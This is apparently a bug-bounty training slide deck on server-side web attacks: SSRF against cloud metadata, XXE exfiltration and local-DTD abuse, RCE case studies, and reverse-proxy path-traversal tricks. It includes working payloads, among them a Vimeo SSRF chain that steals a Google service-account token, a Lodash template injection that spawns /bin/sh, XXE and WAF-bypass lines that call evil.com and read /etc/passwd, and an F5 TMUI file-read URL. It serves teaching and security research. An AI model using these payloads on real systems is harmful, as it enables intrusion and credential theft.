Demystifying the Server Side

Complex terminologies simplified

 Meet the team

Harsh Jaiswal Rahul Maini Rajanish Pathak

@rootxharsh @iamnoooob @h4ckologic

Application Security Engineer Security Engineer Software Security Researcher

Let’s look at the definition of URL according to the RFC 3986.
URL - Uniform Resource Locator

Scheme:

● HTTP
● File

Example HTTP URLs:

● http://<sub.domain.tld>:<port>/
● http://<user>:<pass>@<sub.domain.tld>/path1/path2
● http://<user>:<pass>@<sub.domain.tld>/path?q1=a&q2=b
● http://<user>:<pass>@<sub.domain.tld>/path?q1=a&q2=b#URL Fragment

Example FILE URLs:

● file:///etc/passwd
● file:///home/user/.ssh/id_rsa
● file:///c:/WINDOWS/win.ini
 SSRF, Making the cloud rain

AGENDA
• Introduction to SSRF

• SSRF identification & Impact

• SSRF attack Scenarios

• SSRF case studies

 SSRF – WHAT IS IT?

● Server-side request forgery is a web

security vulnerability that allows an
attacker to induce the server-side
application to make HTTP requests to
an arbitrary domain of the attacker's
choosing.
● In typical SSRF examples, the attacker
might cause the server to make a
connection back to itself, or to other
web-based services within the
organization's infrastructure, or to
external third-party systems.
A Simple SSRF vulnerable snippet.

● A Vulnerable PHP snippet – The user

trusted input ie: URL is passed via
GET method, and the server fetches
the content and displays it.

Can you spot other issue here?

● A Vulnerable Ruby snippet – Here the

application accepts the user input through
the url parameter and the open() call
fetches the Url specified and returns the
response body to the client.
A Simple SSRF

● The attacker forces the application to make an HTTP request back to the server that is hosting the
application.
● Supplying a URL with a host like 127.0.0.1 or localhost.

Fetching the contents on

localhost
● The server will fetch the contents of the /sensitivefilepath and return it to the user.

● URL comes from the local machine itself & the normal access controls are bypassed
 Types of SSRF

● Full response SSRF: an attacker is able to fetch the full response of

an internal/external resource(File, HTTP Response etc.) with an
HTTP request made on behalf of the server

● Blind SSRF: In case of blind SSRF, request is made but no

response is returned to the attacker. To discover which networks are
routed internally or identify internal services, try looking at the time
difference in responses.
SSRF and Cloud Metadata – Make Credentials Rain

● AWS
• If an attacker is able to determine the underlying
• http://169.254.169.254/metadata/v1/* cloud infrastructure he will easily be able to grab the
● Google Cloud
AccessKeyId, SecretAccessKeys, private address,
hostname, public keys, subnet ids, and more from the
• http://metadata.google.internal/computeMetadata/v1/* API.
● DigitalOcean
• http://169.254.169.254/metadata/v1/* • Pulling the IAM role secret keys will give him API
● Docker access to that AWS account and control over the
infrastructure.
• http://127.0.0.1:2375/v1.24/containers/json

● Kubernetes ETCD
• http://127.0.0.1:2379/v2/keys/?recursive=true

● Alibaba Cloud
• http://100.100.100.200/latest/meta-data/*

● Microsoft Azure
• http://169.254.169.254/metadata/v1/*
SSRF
CASE STUDIES
AND LABS
Case Study
SSRF
Vimeo API Playground

Vimeo provides their developers an easy to test and play around their Rest API. For such purposes, Vimeo provides an API
console at https://developers.vimeo.com/.

The purpose of this console is to make it simpler to test API endpoints as such all you’d need to do it

● Select an API Endpoint

● Add required path/query/post parameters
● Click Submit.
Behind the scenes
Example request

Select an endpoint /users/{user_id} to fetch 12345 user’s information.

- method set to GET

- uri parameter set to /users/{user_id}
- segments set to {“user_id”:”12345”}

So backend will supposedly make a request to https://api.vimeo.com/users/12345 and will parse the JSON response and echo

it back to the client/developer.

Abusing the feature

So it seems like we have control over the API endpoint to make request to via the parameter `uri`. However changing it to
anything other than specified path resulted in a 403.
Abusing the feature… Hmmm what now?

However we do have another input in API endpoint path via the segments parameter in the Rest API. Segments value act as
placeholder to be used in the `uri` parameter

What if we use {“uri”:”/users/{user_id}”,“segments”:{“user_id”:”../”}} ;)

This should make a request to https://api.vimeo.com/users/../ and if there’s no URL encoding on segments input, This path on
normalization by HTTP library will make request to https://api.vimeo.com/
And.. Response from the root of the API.
But but we’re still on api.vimeo.com host
Make open redirects great again!

The plan is to find an open redirect and as I already figured this was following redirects, we could simply redirect to an
internal host like cloud (Google) metadata API.
Good old content discovery

A bit of content discovery and I come across a limited redirect on https://api.vimeo.com/ which could make redirect to

https://vimeo.com/ with my controlled path & query parameters. And 2 years on hacking, I already had saved plenty of open

redirects at vimeo.com ;).

https://api.vimeo.com/m/anything?foo=bar => https://vimeo.com/anything?foo=bar

Hitting others hosts

{..,"method":"method":"GET","uri":"/users/{user_id}","segments":"{\"user_id\":\"../../m/path/to/open/redirect?url=
https://rce.ee/attacker.json\"}",...}
Final Payload to steal service account token from Google Metadata API

{"method":"GET","uri":"/users/{user_id}","segments":"{\"user_id\":\"../../m/path/to/open/redirect?url=http://metadata.google.internal/
computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json\"}"}

Response:

{"headers": [ "HTTP/1.1 200", "Content-Type: application/json", "Host: api.vimeo.com" ], "code": 200, "body”: { "access_token":
"ya29.c.EmKeBq9XXDWtXXXXXXXXecIkeR0dFkGT0rJSA", "expires_in": 2631, "token_type": "Bearer" } }

STOP REPORTING OPEN REDIRECTS FOR $100!!

Case study
SSRF Bypass
Integration feature observations

● Application allowed to integrate WooCommerce store via its URL

● Request was sent from server side with prefixed path

● Only HTTPS hosts allowed

● Request’s response was reflected back regardless of integration success

Potential fully responsive SSRF

● Can’t hit AWS/GCP Metadata, works on plain HTTP.

● If we could find an internal host working on HTTPS

● Internally resolving hostnames were not allowed as well. Possible blacklist?

● Find HTTPS hosts those don’t point to internal IP’s but are accessible for employees only. Sounds familiar? VPN only
access hosts?
Let the recon begin

● Subdomain enumeration

● Found corp.company.com, *corp* Interesting, brute it.

● Multiple hosts resolving to either internal IP’s or external IP’s but none were reachable.

● This is exactly what we’re looking for!

● Spots jenkins.corp.company.com pointing to external IP but not reachable.

Why target Jenkins of all the hosts.

● Cause jenkins continuously works with prod server so probably in same VPC.
● Makes sense to use SSL here.
● Generally critical part of Infra - reaching it
would show good impact.
Key takeaways

● Blacklists can always be bypassed

● VPN only hosts should be in your mind when testing for SSRF
● Network segregation is your best bet
 Exploring the File System - XXE

AGENDA
• XML & XXE Basics

• Ways To Exploit XXE:

– InBand/Response Based XXE
– Out-of-Band XXE

• Problems With The Existing Techniques

• Using Local DTDs To Read Filesystem

XML – EXTENSIBLE MARKUP LANGUAGE

● Self-descriptive well structured document

● Stores and transport information and is used as a dataset

● Schema of the elements is defined inside “DOCTYPE” element

● XML parsers are used to fetch values out of the elements

EXAMPLE XML

XML Declaration - defines charset, language etc.

Document Type Definition (DTD) – defines

Schema (Elements, Attributes, Data Types etc.)
of the XML Document

Actual XML Body

EXAMPLE XML (WITH EXTERNAL DTD)

XML Declaration - defines charset, language etc.

Externally hosted
Document Type Definition(DTD)

Actual XML Body

XML ENTITIES

● Simply put Entities act like variables (way of representing data)

● Can denote special markup, such as the <(&lt;) and >(&gt;) tags

● Reducing the code in DTD by bundling declarations into entities

● Entities have “SYSTEM” keyword as well(External Entities)

● Types of XML Entities:

○ BUILT-IN
○ GENERAL
○ PARAMETER
TYPES OF ENTITIES

● General Entities

○ Syntax: <!DOCTYPE foo [

<!ENTITY entity_name “some value”>
]>
○ Can be summoned by &entity_name; only inside XML Body

● Parameter Entities

○ Syntax: <!DOCTYPE foo [

<!ENTITY % entity_name “some value”>
]>

○ Can be summoned by %entity_name; even inside the DOCTYPE definition as well as inside other entities
(Nested Entities)
TYPES OF ENTITIES

General Entities Parameter Entities

XXE - XML EXternal Entity

● XML external entity injection (also known as XXE) is a web security vulnerability that allows an
attacker to interfere with an application's XML parser.

● XXE vulnerabilities arise because the XML specification contains various potentially dangerous
features, and XML parsers support these features even if they are not normally used by the
application.

● An attacker can escalate an XXE attack to compromise the underlying server or other back-end
infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF)
attacks or an arbitrary file read.

Cheatsheet for XXE: https://securityidiots.com/Web-Pentest/XXE/XXE-Cheat-Sheet-by-SecurityIdiots.html

TYPICAL XML REQUEST
TESTING FOR XXE

● Initially try replacing text node with general entities in the XML body and check if response is still
the same which confirms entities
are substituted.

● Construct an XML request with a SYSTEM/PUBLIC entity keyword pointing to Burp Collaborator
URL & check for the hits

● If the request body is accepting JSON, convert JSON to XML and check the response if its parsing
and returning Normal/200 OK responses

● Convert Content-Type from application/json to text/xml or application/xml etc. and check if any
kind of XML parsing happens
XXE: COMMON TECHNIQUES

InBand XXE: Ability to read any local resources on the vulnerable server in the response itself.

Optional
XML XML Declaration
Declaration Header Part
Declaring a dummy !DOCTYPE Element
Creating an External
Entity “xx” referencing to
“hosts” file location

Substituting our General Entity “xx”

INBAND XXE

Note that username element’s value

is reflected as is from the request
INBAND XXE
XXE: COMMON TECHNIQUES

● Out-Of-Band XXE: Ability to exfiltrate any local resources on the vulnerable server to an attacker controller server.
 OUT-OF-BAND XXE #1

2.
3.

We can extract any file say /etc/hosts over FTP since Java disallowed sending illegal characters(\r\n etc.) in HTTP
request from Java 1.5

1. This should be substituted by xxe.dtd contents

4.

5.
 OUT-OF-BAND XXE #2

In the Latest JAVA Version even FTP doesn’t allow sending illegal characters anymore. However, when server errors
are enabled, we can use Server Errors to throws the file contents in the error.

This should be substituted by xxe.dtd contents

OUT-OF-BAND XXE #2

Causing FileNotFoundException to leak file/directory Contents of file:/// which is C:\ in Windows

OUT-OF-BAND XXE

xxe.dtd Contents

This will be further substituted by “exfil” Entity

Doing this should send the file contents to attacker’s FTP server

BUT?? LIMITATION?
WHAT IF THERE IS AN EGRESS FILTERING?

● Out-Of-Band HTTP requests are

blocked by firewall

● Only DNS queries are made

● Cannot utilize externally hosted

payload

http://attacker.com/
xxe.dtd
OUT-OF-BAND XXE #3

▪ File Upload on Domain/Subdomain:

▪ SSRF on Domain/Subdomain

▪ Internal Local DTD includes:

A neat trick which can help to exploit XXE in worst cases using internal DTD files present on the server
LOCAL DTD TECHNIQUE

● Softwares create lot of DTD files by default when installed

● Utilize the already existing DTDs on the local filesystem

● Overwrite parameter entities present inside the local DTDs

● Balance the overwritten Entities where it is called

● Insert payload as you would do in OOB Technique(xxe.dtd)

XXE
CASE STUDY
AND LABS
 EXPLOITING LOCAL DTDs

1. Identify Softwares/Tools/Platform based on the Verbose XML Parser Errors

Non-existing directory is provided

Server throws an error with Full Path to
Application Server which reveals “Tomcat”
is running on Linux
EXPLOITING LOCAL DTDs

2. Install a local copy of the Identified server(Tomcat) or check source on Github etc. if open source and look/search
for existing DTD files manually or use the following repo which lists DTD files present on some very popular and
common applications
https://github.com/GoSecure/dtd-finder/blob/master/list/dtd_files.txt
https://github.com/GoSecure/dtd-finder/blob/master/list/dtd_files_jars.txt (JAR Files containing DTDs)

3. Based on the list above if you are able to confirm the existence of a DTD file or a JAR file containing DTDs on
Tomcat’s local copy next step is to confirm its presence on the target server
EXPLOITING LOCAL DTDs
EXPLOITING LOCAL DTDs

4. The identified JAR file containing DTD(s) “/usr/local/tomcat/lib/jsp-api.jar” exists on the server as no file system errors
were thrown
EXPLOITATION

5. JAR file is nothing but an archive; on your local copy you can extract it

6. Based on the previous list we can see jspxml.dtd is present in /javax/servlet/jsp/resources/ directory inside jsp-api.jar
archive on our machine
EXPLOITATION

7. To access content inside JAR files we need to have support for “jar” protocol which is available in JAVA based servers

Syntax:
jar:<protocol>://<host>/path/file.jar!/path/dir1/dir2/file.dtd

jar:file:///usr/local/tomcat/lib/jsp-api.jar!/javax/servlet/jsp/resources/jspxml.dtd
EXPLOITATION

8. Open the identified DTD file and search for:

1. Definition of some parameter entity

2. Summoning/calling of the same parameter entity somewhere in the file

Definition of Body
parameter entity

Body entity is substituted

here
EXPLOITATION

9. In our XXE payload we can include this local DTD and rewrite Body entity

10. The Contents of overwritten entity would be substituted here so simply balance the
<!ELEMENT jsp:root {{HERE}} >

Body entity is
substituted here
EXPLOITATION
test123

11. Adding this to the XXE payload

<!ENTITY % Body ‘(test)>We Control Internal DTD Here<!ENTITY x "Test"’>

while parsing would result something like:

Body entity is substituted

here
EXPLOITATION
test123

- Summary:

- We Identified a JAR file(jsp-api.jar) in one of the installed softwares on the

target(Tomcat)
- JAR file containing a DTD file (jspxml.dtd) could be accessed using jar:
protocol
- We can overwrite “% Body” parameter entity and control the contents
inside the local DTD file during XML parsing

- Next:
- Insert properly HTML encoded XML payload same as the one we used in
OOB FileNotFoundException trick
 EXPLOITATION

▪ % is Hex-HTML Encoded to &#x25;

▪ ‘ is Hex-HTML Encoded to &#x27;

2.

1.

3. 4.
Contents of /etc/passwd listed
5.
 EXPLOITATION

▪ % is Hex-HTML Encoded to &#x25;

▪ ‘ is Hex-HTML Encoded to &#x27;

2.

1.

3. 4.
Contents of /etc/passwd listed
5.
WAF BYPASS

● XXE WAF Bypass

<!ENTITY xxe SYSTEM "URL">

Usually "SYSTEM" keyword is blocked by many WAFs, In such case you can use "PUBLIC" keyword as an
alternative which has helped to bypass WAFs and Exploit XXEs as SYSTEM and PUBLIC are practically synonyms
● Using "PUBLIC" Parameter Entities

<!ENTITY % xxe PUBLIC "Random Text" "URL">

● Using “PUBLIC” General Entities:

<!ENTITY xxe PUBLIC "Any TEXT" "URL">

● Change encoding for example on UTF-16, UTF-7, etc.

<?xml version="1.0" encoding="UTF-16"?>

and then you can put the content of XML as of UTF-16 character set which would not be detected by WAFs.
WAF BYPASS
● Tampering with doctype/entity names (XXE payloads):

<!DOCTYPE :. SYSTEM "http://"

<!DOCTYPE :_-_: SYSTEM "http://"

<!DOCTYPE {0xdfbf} SYSTEM "http://"

● Remove XML Declaration <?xml version="1.0" encoding="UTF-8"?>

● Adding space before the protocol

<!DOCTYPE :. SYSTEM " http://evil.com/1.dtd"

● Use netdoc:/ in place of file:///

<!ENTITY % data SYSTEM "netdoc:/etc/passwd">

● Different Encodings to bypass WAF

○ %25 instead of “%”
○ %26 instead of “&”
○ %26%23x{hex}; instead of &#x{hex};
○ &#37; instead of &#x25;
○ %26%2337%3b instead of &#37;
WAF BYPASS EXAMPLE
whitespace

● WAF Blocking Scenario

○ Use of <? Or <?xml
○ Use of “%” itself alone
○ Use of any keyword followed by
<!ENTITY ... SYSTEM “here”...>
○ Use of “&#x” pattern

● WAF Bypass
○ Use “%25” instead of “%”
○ Add a whitespace character before protocol after SYSTEM/PUBLIC keyword
○ Instead of &#x25; use &#37; or %26%2337%3b in URL encoded form
 Remote Code Execution
Nailing the shell

AGENDA
• Basics of Remote Code Execution

• Remote Code Execution Case Study

– Arbitrary file overwrite
– Remote Code Execution via Debug Message
– Lodash SSTI RCE
What is RCE?

● Not a vulnerability class in itself.

● Result of exploiting any other vulnerability class; Such as injections (OS Command injections, SSTI), other server side
misconfigurations

● Allows you to execute arbitrary code/command on vulnerable server.

● Data exfiltration over OOB channel

REMOTE CODE
EXECUTION CASE
STUDY
Remote Code Execution via file overwrite
Arbitrary file overwrite on a python application

● Endpoint allowed uploading of files

● Changed “filename” attribute to full path.
● /etc/test.txt - 500 Server Error
● /tmp/test.txt - 200 OK
● Confirmed file write to arbitrary writable
directories
● Wrote file to a directory that was
accessible via web app
Application Reconnaissance

While digging in a feature I came across;

/opt/local/phantomjs/bin/phantomjs --ignore-ssl-errors=yes /opt/resources/xyz.js 'https://localhost:8080/REDACTED'

report.rpt /opt/var/reports/3a71d03e9d584bd092968bc96dcb5f720.png

Observations

● PhantomJS binary was used to generate dynamic PDFs

● The first argument file path was always static /opt/resources/xyz.js

**Highly redacted**
Abusing a feature to gain RCE

We abused the feature to gain remote code execution ;)

● Can’t overwrite phantomjs binary itself as it won’t be overwritten with executable flag
● A javascript file at a static path on the filesystem was passed as the first argument to the phantomjs binary
● Since PhantomJS supports OS level API’s in Javascript it is possible to spawn our own OS process
● Chain the previous Arbitrary file write to overwrite the js file that was getting executed by phantomjs
● Next time PDF is generated attacker controlled server side javascript is ran
● Pop shell! Get bounty!
Overwriting the JS file
Send request to generate PDF
And our command executed ;) *This is not actual PoC*
REMOTE CODE
EXECUTION CASE
STUDY
Remote Code Execution via Debug Mode
App secret leak

● Fuzzed with URL-Encoded characters

● Rails got an exception
● Show exceptions (Debug) mode on?
● Exception message leaked the app
secret.
How Rails Cookies Work?

● Rails cookies format is like <Base64>--<signature>

● Altering the payload part (base64) would result in signature mismatch

● Cookies are signed using a secret token stored in rails app configuration

● A leaked app secret could be used to sign a malicious cookie and lead to escalated access depending on the
application functionality/configuration

● Cookies in rails are serialised generally in two formats, JSON & Marshal.
Marshal serialization format

● Basically serialization/deserialization of object is called Marshalling/UnMarshalling in Ruby

● Marshalling is a standardized representation of an object

● Cookies in rails are usually by default* UnMarshalled

● Manipulate the Payload part of the Cookie and replace it with a Crafted Marshalled Object

● UnMarshalling is done on the Cookie and a specific Gadget is called resulting in RCE
Rails RCE Deserialization gadget chain
RCE via Crafted Cookies
Remember this?
REMOTE CODE
EXECUTION CASE
STUDY
Remote Code Execution via SSTI (Lodash)
Server Side Template Injection

● A template engine is used to process templates which allows defining placeholders that should later on be replaced
for the purpose of implementing designs

● Template engine has most of the capabilities of programming language

● Generally used in web development using MVC pattern.

● User input dynamically used to construct templates can lead to Server Side Template Injections

● Since templates allows to access OS level APIs this could lead to file system access or potentially RCE.
SSTI Detection

● Identify the underlying stack if possible and approach

accordingly

● Spray payloads based on some common template syntaxes

( {{ }}, ${}, <% %>, ) used by majority of templating
engine

● Verbosity of error

● Use special keywords like this, self, and

computations(7*7,’7’*7 etc.) and observe the results and
identify the template
Lodash SSTI via Email Templates

● Application allowed to send Emails using user defined Email message

● Had some example Email messages with ${first.name} syntax in the greetings

● Verbosity of error concluded it was using lodash template

● process.mainModule.require(child_process) which allowed otherwise to load different modules and access OS

level APIs (execute code, File system access) was sandboxed or failed to execute

● Comes process.binding("spawn_sync") into the picture

● Node bindings are mapping to some of native C++ code that NodeJS works upon
https://github.com/nodejs/node/blob/master/src/spawn_sync.cc
Lodash SSTI via Email Templates

${x=Object} // Assigns a JavaScript object “Object” in variable ‘x’

${w=a=new x} // Create other empty Objects (w,a) using variable x. Similar as doing w=a=x={ }
${w.type="pipe"} // {“type”: “pipe”}
${w.readable=1} // {“type”: “pipe”, “readable”:1}
${w.writable=1} // {“type”: “pipe”,“readable”:1,“writeable”:1}
${a.file="/bin/sh"} // {“file”:”/bin/sh”}
${a.args=["/bin/sh","-c","id"]} //{“file”:”/bin/sh”, “args”:[‘/bin/sh’,’-c’,’id’]}
${a.stdio=[w,w]} // [{“type”: “pipe”,“readable”:1,“writeable”:1}, {“type”: “pipe”,“readable”:1,“writeable”:1}]
${process.binding("spawn_sync").spawn(a).output}

process.binding("spawn_sync").spawn({“file”:”/bin/sh”,”args”:[“/bin/sh”,”-c”,”..”], “stdio”:[{stdin...},
{stdout...}]}).output
Boom! P1 in 5 minutes xD
 Reverse Proxies
Your entrypoint to hack a multi-layered architecture

AGENDA
• Basics of Reverse Proxy

• Processing of Requests by Different Servers

• Reverse Proxy Misconfigurations

• Different Servers in Conjunction

• TMUI F5 RCE Case Study

Reverse Proxies in a nutshell

Response is served back to user via reverse Backend server sends response back via reverse
proxy proxy

User makes a HTTP request which hits the Reverse proxy process and passes the request to
reverse proxy backend server
Client
Reverse Proxies in a nutshell

● Web Servers (Nginx, Apache, etc.) configuration consists of various “rules”

● Rules can be based on

○ Path
○ Host Header

● Based on a URI Path/Host Header’s prefix/suffix/regex the request is proxied to another Host (Backend)

● Rules decides the final routing of the requests to the Backend

Vulnerabilities by Reverse Proxies Misconfigurations

● Web Root Path Traversal

● SSRF

● Access Control Bypass

● A lot more..
Nginx As A Reverse Proxy
Nginx as a Reverse Proxy

Processings done by Nginx:

● URL decodes once & normalizes the path e.g. /../, %2f..%2f etc. (/.. is not normalized) before matching location rule

● Ignores “#” URI Fragment part

● doesn't allow %2f as the first slash and //// (multiple slashes) becomes /

● if root trailing '/' is missing in proxy_pass argument, unprocessed raw path is sent as is
Nginx as a Reverse Proxy

Example Rule #1

server {

location /app1 { # Matches the Prefix /app1*

proxy_pass http://internal.app;
}
}

Any HTTP request to Nginx server with path /app1<anything here> would be proxied to http://internal.app
/<anything here>
Nginx as a Reverse Proxy

Example Rule #2

server {

location ~ ^/app2/(.*\.jpg)$ { # Matches any file ending with .jpg in /app2/ directory
proxy_pass http://internal.app/app2/$1; # passes the match here ($1)
}
}

Any HTTP request to Nginx server with path /app2/<anything>.jpg would be proxied to http://internal.app
/app2/<anything>.jpg
Nginx Path Traversal Misconfiguration #1

server {

location /api { # Notice the Missing trailing slash

proxy_pass http://internal.app/public-api/;

}
}

Exploit Example:

http://site.com/api../internal-api/users would match the prefix rule “/api” and route it to http://internal.app/public-
api/../internal-api/users which becomes http://internal.app/internal-api/users
Nginx Path Traversal Misconfiguration #2

server {

location /static {
alias /home/app/static/;

}
}

“alias” directive in Nginx allows to load files directly from a directory on the server’s local filesystem, usually used
for loading static contents.

Example: http://site.com/static/image.jpg would load “image.jpg” from the path “/home/app/static/image.jpg”

Nginx Path Traversal Misconfiguration #2

server {

location /static { # Notice the missing trailing slash

alias /home/app/static/; # Notice the trailing slash

}
}

Exploit Example:

http://site.com/static../settings.py here, “/static../settings.py” is substituted with its alias

”/home/app/static/../settings.py” i.e. /home/app/settings.py which will contains App secrets/keys/passwords etc.
Apache As A Reverse Proxy
Apache as a Reverse Proxy

Example Rule #1

Apache-default.conf:
<VirtualHost *:80>
ProxyPreserveHost On
ProxyPass /app http://internal.app/
</VirtualHost>

Any HTTP request to Apache server with path /app/<anything here> would be proxied to http://internal.app
/<anything here>,
Apache as a Reverse Proxy

Processings done by Apache:

● URL decodes once & normalizes the path before matching location rule

● //// (multiple slashes) becomes / if it’s in the beginning eg. ///path/ => /path

● Afterwards, /path1//path2/ Apache treats // as an individual directory with blank name

● Sends processed request

Can you spot the misconfiguration here?

Apache-default.conf:

<VirtualHost *:80>
ProxyPreserveHost Off
ProxyPassMatch "^/img(.*)$" "http://static-images.storage.googleapis.com$1"
</VirtualHost>
Apache SSRF Misconfiguration

Apache-default.conf:

<VirtualHost *:80>
ProxyPreserveHost Off
ProxyPassMatch "^/img(.*)$" "http://static-images.storage.googleapis.com$1"
</VirtualHost>

Missing trailing slash

Any request with path /[email protected]/ or /img.evil.com/ would now allow to make arbitrary server side HTTP
requests to evil.com via reverse proxy.
Different Servers In Conjunction
Path Parameters in Java based Servers

● Similar to Query strings (?a=1&b=2) but delimited by “;”

● Example: “/index.jsp;x=1;y=2” consists of path parameters x & y

● Having extraneous “;” also won’t affect loading the file

● Example: “/index.jsp;” would still return “/index.jsp” content

● https://tools.ietf.org/html/rfc6570#page-25
Path Parameters in Tomcat

Tomcat parses the Path in the following manner

● Remove Path Parameters - beginning from “;” until position of “/”

https://github.com/apache/tomcat/blob/f3c9fdd40bdbc3dc22b512596954e2bc6d424d5a/java/org/apache/catal
ina/connector/Request.java#L2117-L2140

Example:
“/xyz;test=1/index.jsp” would become “/xyz/index.jsp”
“/xyz;/index.jsp” would become “/xyz/index.jsp”

● URL Decodes the path

● Normalizes the path (basically resolves /../ or multiple /// etc.)

Nginx/Apache Reverse Proxy + Tomcat Backend

server {

location /app/ {
proxy_pass http://internal.app:8080/public/;

}
}

Any HTTP request to Nginx server with path /app/<anything here> would be proxied to the Tomcat server running
on local interface at http://internal.app:8080/public/<anything here>
Nginx/Apache Reverse Proxy + Tomcat Backend Misconfiguration

Examples:

- http://site.com/app/ would match the rule “/app/” and proxy it to http://internal.app:8080/public/ internally

- http://site.com/app/xxxxx would proxy to http://internal.app:8080/public/xxxxx internally

Nginx/Apache Reverse Proxy + Tomcat Backend Misconfiguration

● Suppose there exists an unauth internal API/path/file or say Tomcat Manager running with default credentials
on the Tomcat server.

● Remember the http://internal.app:8080 service is not exposed externally

● http://site.com/app/../ would be processed by Nginx to “/” and will look for the rule “/” instead of “/app/”

● Therefore, /../ or ../ or %2f..%2f or similar variations won’t work

Meet semicolon: ..;/ is the new ../ of tomcat.

Exploit:

http://site.com/app/..;/secretapi/users

http://site.com/app/..;/manager/html
Nginx/Apache Reverse Proxy + Tomcat Backend Misconfiguration

NGINX Processing:

● /app/..;/secretapi/users matches “/app/” prefix rule

● “/app/..;/” means nothing special to Nginx and “/..;/” is just another directory name for Nginx so no
Normalization happens

● Forwards it to the internally running Tomcat server as is http://internal.app:8080/public/..;/secretapi/users

Nginx/Apache Reverse Proxy + Tomcat Backend Misconfiguration

Tomcat Processing:

● Tomcat receives /public/..;/secretapi/users

● URL decodes & Removes path parameters hence ..;/ becomes ../

● New path is /public/../secretapi/users

● Normalizes path - Resolves /../ and we’re one directory back, that is root path of the host and finally now the
new path is /secretapi/users

● /secretapi/users response is served to client via reverse proxy.

Nginx (Reverse proxy) + Apache (Backend)

nginx.conf: USE CASE:

server {
location / { http://site.com/protected => Nginx 403 Forbidden
proxy_pass http://apache.internal;
http://site.com/test => http://apache.internal/test
}
location /protected/ {
deny all; return 403;
}
}
Nginx (Reverse proxy) + Apache (Backend) Misconfiguration

nginx.conf:
server {
location / {
proxy_pass http://apache.internal;
}
location /protected/ {
deny all; return 403;
}
}

Exploit Example:
http://apache.internal/protected//../
Nginx + Apache Misconfiguration

How?
Missing trailing slash

http://site.com/protected => 403 Forbidden (Nginx)

http://site.com/x// => [P] http://apache.internal/x//

http://site.com/x//../ => [P] http://apache.internal/x//../ => [N] http://apache.internal/x/

http://site.com/protected//../ => [P] http://apache.internal/protected//../ => [N] http://apache.internal/protected

[P] = Proxy Pass , [N] = Normalize

TMUI F5 RCE Case Study
Case Study on F5 TMUI RCE

Environment:

Apache as Reverse proxy + Apache Tomcat as Backend

Config file: proxy_ajp.conf

Case Study on F5 TMUI RCE

/tmui/(.*\.jsp.*) will proxy pass it to ajp://localhost:8009/tmui/<anything>.jsp<anything>

/tmui/login.jsp is a file which could be access unauth’d

/tmui/login.jsp/..;/ is proxy passed as ajp://localhost:8009/tmui/login.jsp/..;/ which becomes

a. Remove Path Parameters:

“/tmui/login.jsp/..;/” => “/tmui/login.jsp/../”
b. URL Decodes:
“/tmui/login.jsp/../” => “/tmui/login.jsp/../”
c. Normalizes:
“/tmui/login.jsp/../” => “/tmui/”
Case Study on F5 TMUI RCE

Local File Read

/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

a. Remove Path Parameters

b. URL Decodes
c. Normalizes

ajp://localhost:8009/tmui/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd
References
All of this is read from a lot of resources here’s few we could think of. There’s way too much to read at these blogs. If you feel like you’re not credited, please
reach at @rootxharsh or @iamnoooob

https://i.blackhat.com/us-18/Wed-August-8/us-18-Orange-Tsai-Breaking-Parser-Logic-Take-Your-Path-Normalization-Off-And-Pop-0days-Out-2.pdf (Orange ofc)

https://mohemiv.com/all/exploiting-xxe-with-local-dtd-files/

https://github.com/GoSecure/dtd-finder

https://2018.zeronights.ru/wp-content/uploads/materials/20-Reverse-proxies-Inconsistency.pdf

https://fr.gosecure.net/blog/2019/07/16/automating-local-dtd-discovery-for-xxe-exploitation/

https://www.elttam.com/blog/ruby-deserialization/

https://www.acunetix.com/blog/articles/a-fresh-look-on-reverse-proxy-related-attacks/

https://swarm.ptsecurity.com/rce-in-f5-big-ip/ (They fire!)

https://github.com/GrrrDog/weird_proxies (Very cool!)

https://www.scribd.com/document/457677157/Attacking-Secondary-Contexts-in-Web-Applications

http://portswigger.net/
HACK THE PLANET!!!